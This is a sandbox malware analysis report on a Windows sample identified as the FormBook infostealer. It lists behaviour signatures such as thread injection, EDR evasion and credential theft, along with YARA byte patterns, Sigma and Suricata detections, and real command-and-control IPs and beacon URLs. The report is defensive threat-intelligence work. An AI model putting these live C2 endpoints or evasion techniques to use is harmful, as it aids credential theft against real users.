Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
CITA#U00c7#U00c3O.exe

Overview

General Information

Sample name:CITA#U00c7#U00c3O.exe
renamed because original name is a hash value
Original sample name:CITAO.exe
Analysis ID:1519260
MD5:05643e059a165f8b6b3b3e4bd0d9f226
SHA1:c1ba7b632f31db543ef178fbd9d48809bf1c2eca
SHA256:ec4594c01b27748273f47aeefc3fc2f3bc67af0b55a72ccd129936bfb0b715b1
Tags:exeFormbookuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • CITA#U00c7#U00c3O.exe (PID: 6756 cmdline: "C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe" MD5: 05643E059A165F8B6B3B3E4BD0D9F226)
    • svchost.exe (PID: 6960 cmdline: "C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • DJonRIGNYjBRZ.exe (PID: 5780 cmdline: "C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 6160 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • DJonRIGNYjBRZ.exe (PID: 1880 cmdline: "C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1804 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.4151245699.0000000002B50000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.4151245699.0000000002B50000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bd00:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13f2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000006.00000002.4152977911.0000000003290000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.4152977911.0000000003290000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bd00:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13f2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000006.00000002.4152890125.0000000003240000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 9 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.svchost.exe.2670000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.svchost.exe.2670000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2ed63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16f92:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          1.2.svchost.exe.2670000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            1.2.svchost.exe.2670000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2df63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16192:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe", CommandLine: "C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe", ParentImage: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe, ParentProcessId: 6756, ParentProcessName: CITA#U00c7#U00c3O.exe, ProcessCommandLine: "C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe", ProcessId: 6960, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe", CommandLine: "C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe", ParentImage: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe, ParentProcessId: 6756, ParentProcessName: CITA#U00c7#U00c3O.exe, ProcessCommandLine: "C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe", ProcessId: 6960, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-26T09:23:04.559019+020020507451Malware Command and Control Activity Detected192.168.2.44978185.159.66.9380TCP
            2024-09-26T09:23:55.434101+020020507451Malware Command and Control Activity Detected192.168.2.449736148.72.152.17480TCP
            2024-09-26T09:24:21.563900+020020507451Malware Command and Control Activity Detected192.168.2.4497413.33.130.19080TCP
            2024-09-26T09:24:35.420856+020020507451Malware Command and Control Activity Detected192.168.2.449745172.191.244.6280TCP
            2024-09-26T09:24:49.378438+020020507451Malware Command and Control Activity Detected192.168.2.449749172.96.191.3980TCP
            2024-09-26T09:25:07.759988+020020507451Malware Command and Control Activity Detected192.168.2.449753217.70.184.5080TCP
            2024-09-26T09:25:21.626143+020020507451Malware Command and Control Activity Detected192.168.2.44975763.250.47.4080TCP
            2024-09-26T09:25:34.954937+020020507451Malware Command and Control Activity Detected192.168.2.44976191.184.0.20080TCP
            2024-09-26T09:25:48.123872+020020507451Malware Command and Control Activity Detected192.168.2.44976513.248.169.4880TCP
            2024-09-26T09:26:16.665501+020020507451Malware Command and Control Activity Detected192.168.2.44977343.242.202.16980TCP
            2024-09-26T09:26:30.855122+020020507451Malware Command and Control Activity Detected192.168.2.449777103.224.182.24280TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-26T09:23:04.559019+020028554651A Network Trojan was detected192.168.2.44978185.159.66.9380TCP
            2024-09-26T09:23:55.434101+020028554651A Network Trojan was detected192.168.2.449736148.72.152.17480TCP
            2024-09-26T09:24:21.563900+020028554651A Network Trojan was detected192.168.2.4497413.33.130.19080TCP
            2024-09-26T09:24:35.420856+020028554651A Network Trojan was detected192.168.2.449745172.191.244.6280TCP
            2024-09-26T09:24:49.378438+020028554651A Network Trojan was detected192.168.2.449749172.96.191.3980TCP
            2024-09-26T09:25:07.759988+020028554651A Network Trojan was detected192.168.2.449753217.70.184.5080TCP
            2024-09-26T09:25:21.626143+020028554651A Network Trojan was detected192.168.2.44975763.250.47.4080TCP
            2024-09-26T09:25:34.954937+020028554651A Network Trojan was detected192.168.2.44976191.184.0.20080TCP
            2024-09-26T09:25:48.123872+020028554651A Network Trojan was detected192.168.2.44976513.248.169.4880TCP
            2024-09-26T09:26:16.665501+020028554651A Network Trojan was detected192.168.2.44977343.242.202.16980TCP
            2024-09-26T09:26:30.855122+020028554651A Network Trojan was detected192.168.2.449777103.224.182.24280TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-26T09:24:10.970988+020028554641A Network Trojan was detected192.168.2.4497383.33.130.19080TCP
            2024-09-26T09:24:13.521153+020028554641A Network Trojan was detected192.168.2.4497393.33.130.19080TCP
            2024-09-26T09:24:16.052736+020028554641A Network Trojan was detected192.168.2.4497403.33.130.19080TCP
            2024-09-26T09:24:27.786721+020028554641A Network Trojan was detected192.168.2.449742172.191.244.6280TCP
            2024-09-26T09:24:30.335442+020028554641A Network Trojan was detected192.168.2.449743172.191.244.6280TCP
            2024-09-26T09:24:32.880497+020028554641A Network Trojan was detected192.168.2.449744172.191.244.6280TCP
            2024-09-26T09:24:41.763173+020028554641A Network Trojan was detected192.168.2.449746172.96.191.3980TCP
            2024-09-26T09:24:44.289289+020028554641A Network Trojan was detected192.168.2.449747172.96.191.3980TCP
            2024-09-26T09:24:46.853309+020028554641A Network Trojan was detected192.168.2.449748172.96.191.3980TCP
            2024-09-26T09:25:00.076321+020028554641A Network Trojan was detected192.168.2.449750217.70.184.5080TCP
            2024-09-26T09:25:02.640352+020028554641A Network Trojan was detected192.168.2.449751217.70.184.5080TCP
            2024-09-26T09:25:05.171228+020028554641A Network Trojan was detected192.168.2.449752217.70.184.5080TCP
            2024-09-26T09:25:13.976010+020028554641A Network Trojan was detected192.168.2.44975463.250.47.4080TCP
            2024-09-26T09:25:16.518559+020028554641A Network Trojan was detected192.168.2.44975563.250.47.4080TCP
            2024-09-26T09:25:19.075531+020028554641A Network Trojan was detected192.168.2.44975663.250.47.4080TCP
            2024-09-26T09:25:28.201219+020028554641A Network Trojan was detected192.168.2.44975891.184.0.20080TCP
            2024-09-26T09:25:29.847472+020028554641A Network Trojan was detected192.168.2.44975991.184.0.20080TCP
            2024-09-26T09:25:32.503709+020028554641A Network Trojan was detected192.168.2.44976091.184.0.20080TCP
            2024-09-26T09:25:40.470004+020028554641A Network Trojan was detected192.168.2.44976213.248.169.4880TCP
            2024-09-26T09:25:43.017322+020028554641A Network Trojan was detected192.168.2.44976313.248.169.4880TCP
            2024-09-26T09:25:45.577550+020028554641A Network Trojan was detected192.168.2.44976413.248.169.4880TCP
            2024-09-26T09:26:08.214268+020028554641A Network Trojan was detected192.168.2.44977043.242.202.16980TCP
            2024-09-26T09:26:10.737327+020028554641A Network Trojan was detected192.168.2.44977143.242.202.16980TCP
            2024-09-26T09:26:13.288202+020028554641A Network Trojan was detected192.168.2.44977243.242.202.16980TCP
            2024-09-26T09:26:23.209876+020028554641A Network Trojan was detected192.168.2.449774103.224.182.24280TCP
            2024-09-26T09:26:25.747416+020028554641A Network Trojan was detected192.168.2.449775103.224.182.24280TCP
            2024-09-26T09:26:28.315372+020028554641A Network Trojan was detected192.168.2.449776103.224.182.24280TCP
            2024-09-26T09:26:37.512382+020028554641A Network Trojan was detected192.168.2.44977885.159.66.9380TCP
            2024-09-26T09:26:40.061281+020028554641A Network Trojan was detected192.168.2.44977985.159.66.9380TCP
            2024-09-26T09:26:42.606058+020028554641A Network Trojan was detected192.168.2.44978085.159.66.9380TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: CITA#U00c7#U00c3O.exeAvira: detected
            Antivirus detection for URL or domain
            Source: https://www.elsupertodo.net/2jit/?y0qt3F=iS4P4oRSl8BXKzGHIPEeBFILTgF0I4K6JXAZlPSQukWhX6ryYmutleAvira URL Cloud: Label: malware
            Source: http://www.elsupertodo.net/2jit/?y0qt3F=iS4P4oRSl8BXKzGHIPEeBFILTgF0I4K6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1TqEhan6EIKUcOtzcvEOIT7DGSSciknjeHA8=&kZ=E8WpIAvira URL Cloud: Label: malware
            Source: http://www.omexai.info/7xi5/?y0qt3F=ixI46zwDNWOoK0d6d59SvpgDB+zqSFA+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELBx/+PEXrpF63uptF2gwKAcNaoJelZ45iHH4=&kZ=E8WpIAvira URL Cloud: Label: malware
            Source: http://www.tekilla.wtf/fpzw/Avira URL Cloud: Label: malware
            Source: http://www.omexai.info/7xi5/Avira URL Cloud: Label: malware
            Source: http://www.bola88site.one/3qit/Avira URL Cloud: Label: malware
            Source: http://www.tekilla.wtf/fpzw/?kZ=E8WpI&y0qt3F=vk5QQsijTkj0pfF2YbFfXs6zKmlYZL+gcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyVw6vzCqwT6MlUYIeNh7VIWund7P0tYTSeyak=Avira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: CITA#U00c7#U00c3O.exeReversingLabs: Detection: 63%
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.2670000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.2670000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.4151245699.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4152977911.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4152890125.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2006339526.0000000007BD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2001885118.0000000002670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4152933454.00000000041F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2002697433.0000000005290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: CITA#U00c7#U00c3O.exeJoe Sandbox ML: detected
            Source: CITA#U00c7#U00c3O.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: DJonRIGNYjBRZ.exe, 00000005.00000000.1913555619.00000000007EE000.00000002.00000001.01000000.00000005.sdmp, DJonRIGNYjBRZ.exe, 00000007.00000002.4151235223.00000000007EE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: CITA#U00c7#U00c3O.exe, 00000000.00000003.1778079460.0000000004770000.00000004.00001000.00020000.00000000.sdmp, CITA#U00c7#U00c3O.exe, 00000000.00000003.1776550231.00000000045D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2002269584.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1890366251.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1892230836.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2002269584.000000000319E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4153269474.000000000373E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4153269474.00000000035A0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2004390893.00000000033F1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2002161958.0000000003247000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: CITA#U00c7#U00c3O.exe, 00000000.00000003.1778079460.0000000004770000.00000004.00001000.00020000.00000000.sdmp, CITA#U00c7#U00c3O.exe, 00000000.00000003.1776550231.00000000045D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2002269584.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1890366251.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1892230836.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2002269584.000000000319E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000006.00000002.4153269474.000000000373E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4153269474.00000000035A0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2004390893.00000000033F1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2002161958.0000000003247000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000001.00000003.1971008529.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2002077943.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, DJonRIGNYjBRZ.exe, 00000005.00000003.1951321125.00000000008AB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000006.00000002.4153839675.0000000003BCC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4151687754.000000000314E000.00000004.00000020.00020000.00000000.sdmp, DJonRIGNYjBRZ.exe, 00000007.00000002.4153318134.000000000329C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2397067589.000000000C51C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000006.00000002.4153839675.0000000003BCC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4151687754.000000000314E000.00000004.00000020.00020000.00000000.sdmp, DJonRIGNYjBRZ.exe, 00000007.00000002.4153318134.000000000329C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2397067589.000000000C51C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000001.00000003.1971008529.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2002077943.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, DJonRIGNYjBRZ.exe, 00000005.00000003.1951321125.00000000008AB000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02B6C2C0 FindFirstFileW,FindNextFileW,FindClose,6_2_02B6C2C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then xor eax, eax6_2_02B59B90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then pop edi6_2_02B72399
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then mov ebx, 00000004h6_2_033904DE

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49740 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49738 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49739 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49741 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49741 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49742 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49736 -> 148.72.152.174:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49736 -> 148.72.152.174:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49754 -> 63.250.47.40:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49747 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49761 -> 91.184.0.200:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49756 -> 63.250.47.40:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49758 -> 91.184.0.200:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49761 -> 91.184.0.200:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49750 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49773 -> 43.242.202.169:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49773 -> 43.242.202.169:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49749 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49745 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49745 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49757 -> 63.250.47.40:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49749 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49743 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49757 -> 63.250.47.40:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49772 -> 43.242.202.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49744 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49762 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49771 -> 43.242.202.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49775 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49759 -> 91.184.0.200:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49755 -> 63.250.47.40:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49764 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49753 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49753 -> 217.70.184.50:80
